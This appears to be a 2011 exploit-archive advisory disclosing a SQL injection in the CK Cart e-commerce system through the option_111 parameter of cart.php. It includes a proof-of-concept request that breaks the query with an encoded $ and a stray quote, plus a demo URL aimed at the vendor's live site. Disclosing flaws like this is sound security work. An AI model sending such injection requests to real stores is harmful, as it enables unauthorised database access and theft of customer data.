CK Cart suffers from a remote SQL injection vulnerability.
SHA-256: e3756f269b5d6ec276b4f3f23da5b91d1cf3cfbfec2a7ba169c459b1e6d1f4e9
# Exploit Title: CK Cart (E-Commerce System) SQL Injection
# Date: 19.08.2011
# Author: Eyup CELIK
# Software Link: http://www.ckcart.com/
# Version: All versions
# Tested on: All versions are vulnerable
ISSUE
SQL injection is possible through user-supplied request parameters; the option_111 parameter of the add-to-cart request is the one shown below.
Vulnerable Page:
cart.php
Example:
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL Injection Code>&quantity=1&submit=Order
Exploit (%24 is a URL-encoded $; the unbalanced single quote that follows it terminates the string literal the value is placed in, which is what exposes the injection):
cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24'1&quantity=1&submit=Order
Demo:
http://www.ckcart.com/cart.php?action=add&item_id=173&manufacturer_id=34&option_111=%24<SQL Injection Code>&quantity=1&submit=Order
Thanks,
Eyup CELIK
Information Technologies Security Specialist
http://www.eyupcelik.com.tr